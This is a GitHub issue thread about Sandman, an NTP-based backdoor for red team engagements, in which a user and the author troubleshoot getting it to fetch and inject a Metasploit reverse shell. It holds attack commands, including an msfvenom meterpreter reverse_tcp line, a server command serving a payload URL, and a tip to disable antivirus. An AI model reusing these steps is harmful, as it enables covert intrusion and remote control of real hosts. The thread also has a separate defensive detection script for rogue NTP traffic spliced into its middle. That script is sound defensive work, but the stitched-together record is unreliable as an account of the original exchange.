Idov31 / Sandman

Sandman is a NTP based backdoor for red team engagements in hardened networks.
GNU General Public License v3.0

Why is it not working? [Usage issue] #2

Closed iz4tow closed 2 years ago

iz4tow commented 2 years ago

Hello, I tried to compile the backdoor with VS 2022 (of course changing the ntpServer string) and started the server using this command: ~# ./sandman_server.py vmnet1 http://192.168.106.1/rs_exploitl.exe

[ + ] Got a packet from the backdoor!
[ ! ] Entering sandman...
[ + ] Activated the backdoor for 192.168.106.128!

192.168.106.128 is obviously the Windows host. On 192.168.106.1 there is a simple HTTP server (python -m SimpleHTTPServer 80) that exposes rs_exploitl.exe, a simple Metasploit TCP reverse shell.

But nothing happens. I also used Wireshark on the Windows host to monitor the traffic, but I can see only the NTP traffic and nothing else.

Injector.InjectShellcode(payloadUrl, payloadSize, "RuntimeBroker") returns true... so I can't understand.

Thanks in advance

Idov31 commented 2 years ago

Hey, when injecting into RuntimeBroker you need to run with administrative privileges. If you change the target to something else or run this as an administrator, does it work?

iz4tow commented 2 years ago

I tried to run as administrator and I also tried to inject into Notepad (Notepad of course was running) but nothing changed. However, if the injection fails I think that Injector.InjectShellcode(payloadUrl, payloadSize, "RuntimeBroker") will return false.

Idov31 commented 2 years ago

Can you provide the Windows version and build? Also, I pushed a bug fix yesterday; are you using the latest version?

iz4tow commented 2 years ago

It is the last commit I think; here is the hash: aebe07410d558527c2cb8d12b663419ca7b3dd82
Sandman Server on Ubuntu 20.04
Sandman "client" on Windows 11 Pro N 21H2 build 22000.318 and Windows 10 Edu build 19044.1766

Idov31 commented 2 years ago

I'm trying to recreate the issue, when you compiled the SandmanBackdoor (client) - you used x64 or the default Any CPU option?

iz4tow commented 2 years ago

I tried with Any CPU.

Idov31 commented 2 years ago

Try with x64 and let me know if it worked, I'll add this to the compiling instructions :)

iz4tow commented 2 years ago

You are right, with x64 it does the download:

Serving HTTP on 0.0.0.0 port 80 ...
192.168.106.128 - - [27/Aug/2022 19:40:02] "GET /rs_exploitl.exe HTTP/1.1" 200 -

but it does not launch rs_exploitl.exe. Of course, if I manually download the .exe file and launch it, it works, so the problem is not in the Metasploit rev_shell.

To try Sandman I followed this simple guide to make a simple rev_tcp backdoor with metasploit reverse_shell
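The footprint described in this thread is what a defender can look for: a host that shows only NTP traffic, to a server that is not one of the organisation's time sources, and then a plain HTTP GET of a file from the same network. The script below is an added detection example; it is not code from the thread or from the Sandman project. It assumes a constructed flow log in a "timestamp src dst proto detail" format, an assumed list of approved NTP servers (APPROVED_NTP_SERVERS) and an assumed five-minute correlation window, and it flags hosts that exchange NTP with an unapproved server, escalating the finding when an HTTP download from that host follows within the window.

```python
import re
from datetime import datetime, timedelta

# Assumption: the organisation's sanctioned time sources. Anything else
# answering on udp/123 is worth a look in a hardened network.
APPROVED_NTP_SERVERS = {"10.0.0.5"}

# Assumption: how long after the NTP exchange a payload fetch is still
# considered related to it.
CORRELATION_WINDOW = timedelta(minutes=5)

# Constructed log format (not a real product's format):
#   <ISO timestamp> <src ip> <dst ip> <proto/port> <detail>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<proto>\S+) (?P<detail>.*)$"
)

# Constructed sample flow log: one host talks NTP to an unapproved server and
# then fetches an executable, one host uses the approved server, and one host
# talks to the unapproved server without a follow-up download.
SAMPLE_LOG = """\
2022-08-27T19:39:50 192.168.106.128 192.168.106.1 udp/123 ntp_request
2022-08-27T19:39:51 192.168.106.128 192.168.106.1 udp/123 ntp_request
2022-08-27T19:40:02 192.168.106.128 192.168.106.1 tcp/80 GET /rs_exploitl.exe
2022-08-27T19:41:00 192.168.106.140 10.0.0.5 udp/123 ntp_request
2022-08-27T19:41:30 192.168.106.140 192.168.106.50 tcp/80 GET /index.html
2022-08-27T20:10:00 192.168.106.150 192.168.106.1 udp/123 ntp_request
"""


def parse_events(text):
    """Parse the constructed flow log into dicts with a datetime timestamp."""
    events = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # skip blank or malformed lines rather than crash
        event = match.groupdict()
        event["ts"] = datetime.fromisoformat(event["ts"])
        events.append(event)
    return events


def find_rogue_ntp(events):
    """Report (client, unapproved NTP server) pairs.

    Severity is 'medium' for the NTP exchange alone and 'high' when the same
    client issues an HTTP GET within CORRELATION_WINDOW after it.
    """
    findings = []
    seen_pairs = set()
    for ntp in events:
        if ntp["proto"] != "udp/123" or ntp["dst"] in APPROVED_NTP_SERVERS:
            continue
        pair = (ntp["src"], ntp["dst"])
        if pair in seen_pairs:
            continue  # one finding per client/server pair
        seen_pairs.add(pair)
        deadline = ntp["ts"] + CORRELATION_WINDOW
        downloads = [
            e["detail"]
            for e in events
            if e["src"] == ntp["src"]
            and e["proto"].startswith("tcp/")
            and e["detail"].startswith("GET ")
            and ntp["ts"] <= e["ts"] <= deadline
        ]
        findings.append({
            "host": ntp["src"],
            "ntp_server": ntp["dst"],
            "severity": "high" if downloads else "medium",
            "downloads": downloads,
        })
    return findings


if __name__ == "__main__":
    for finding in find_rogue_ntp(parse_events(SAMPLE_LOG)):
        print(finding)
```

In a real deployment the flow log would come from a firewall, NetFlow/Zeek export or a proxy log, and the approved-server list from configuration; the logic stays the same: NTP to an unexpected peer is the signal, and a file fetch shortly afterwards is what turns it into a priority alert.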

Idov31 commented 2 years ago

Now I understand the problem. You wrote this before and I didn't notice, but Sandman is meant for shellcode and not for standalone programs; it might be changed in the future.

I'll bold the part that it can only run shellcode for now in the README to avoid confusion.

iz4tow commented 2 years ago

Oh sorry, you are right. With shellcode it's working, but only with the x64 CPU option.

Idov31 commented 2 years ago

Currently, it won't work with an x86 shellcode since it relies on an injected x64 shellcode (https://github.com/Idov31/Sandman/blob/master/SandmanBackdoor/Sandman/Injector.cs#L10). If you don't mind, I'll pin this issue so it will be helpful for others as well, and clarify the README.

iz4tow commented 2 years ago

Hi. I tried with the x64 build parameter on VS2022 and the software does the download, but I can't run my shellcode. To generate the shellcode I used this msf command: msfvenom -p windows/x64/meterpreter/reverse_tcp 192.168.106.1 LPORT=4444 -f raw > exploit

The webserver: python -m SimpleHTTPServer 80 (working and downloading)

Sandman Server: python3 sandman_server.py vmnet1 http://192.168.106.1/exploit

The client downloads the shellcode but does nothing more. I think I'm doing something wrong, can you help me?

What am I doing wrong?

Thanks

Idov31 commented 2 years ago

Hey, please try the following actions and tell me if that worked:

  1. Since Metasploit's reverse shell is heavily detected, try to disable the AV if you want to test it with an unobfuscated version of it.
  2. Make sure you changed the payload size variable in the server properties.

If it still doesn't work you can contact me on Twitter: @Idov31 and I'll debug the problem with you (I can't recreate the problem).

iz4tow commented 2 years ago

I left a message on your post on Twitter. However, I have a 510-byte shellcode and I set 0x1fe as PAYLOAD_SIZE in sandman_server.py, but it is still not working; the Sandman client does the download (I can see it from the SimpleHTTPServer console). The problem is not the AV software, because I tried to use a Meterpreter executable and it worked.

Idov31 commented 2 years ago

Since the source of this issue is in the injected shellcode (taken from D-R-Shellcode), I'm closing this issue. When the issue is fixed I'll update Sandman.